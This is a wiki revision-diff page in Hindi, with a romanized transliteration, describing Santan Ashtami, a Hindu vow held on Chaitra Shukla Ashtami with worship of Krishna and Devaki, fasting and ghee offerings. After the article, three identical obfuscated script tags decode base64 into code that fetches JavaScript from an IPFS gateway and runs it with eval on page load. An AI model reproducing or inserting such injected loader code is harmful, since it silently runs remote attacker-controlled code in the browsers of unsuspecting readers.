Difference between revisions of "सन्तान अष्टमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (सन्तानाष्टमी का नाम बदलकर सन्तान अष्टमी कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[चैत्र]] [[शुक्ल पक्ष]] की [[अष्टमी]] पर सन्तानाष्टमी किया जाता है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की [[अष्टमी]] पर सन्तानाष्टमी किया जाता है।
*सन्तानाष्टमी तिथिव्रत; [[कृष्ण]] एवं [[देवकी]] की पूजा; उपवास किया जाता है।
+
*सन्तानाष्टमी तिथिव्रत होता है।
 +
*[[कृष्ण]] एवं [[देवकी]] की पूजा की जाती है।
 +
*इस व्रत में उपवास किया जाता है।
 
*सन्तानाष्टमी एक वर्ष के लिए किया जाता है।
 
*सन्तानाष्टमी एक वर्ष के लिए किया जाता है।
*चार [[मास|मासों]] की अवधि में अष्टमी पर कृष्ण प्रतिमा का [[घी]] से स्नान एवं घी का दान करना चाहिए। <ref>हेमाद्रि (व्रत खण्ड 1, 846-847, विष्णुधर्मोत्तरपुराण 3|217|1-11 का उद्धरण)</ref>
+
*चार [[मास|मासों]] की अवधि में अष्टमी पर कृष्ण प्रतिमा का [[घी]] से स्नान एवं घी का दान करना चाहिए।<ref>हेमाद्रि (व्रत खण्ड 1, 846-847, विष्णुधर्मोत्तरपुराण 3|217|1-11 का उद्धरण</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh ki ashtami par santanashtami kiya jata hai.
  • santanashtami tithivrat hota hai.
  • krishna evan devaki ki pooja ki jati hai.
  • is vrat mean upavas kiya jata hai.
  • santanashtami ek varsh ke lie kiya jata hai.
  • char masoan ki avadhi mean ashtami par krishna pratima ka ghi se snan evan ghi ka dan karana chahie.[1]

tika tippani aur sandarbh

  1. hemadri (vrat khand 1, 846-847, vishnudharmottarapuran 3|217|1-11 ka uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>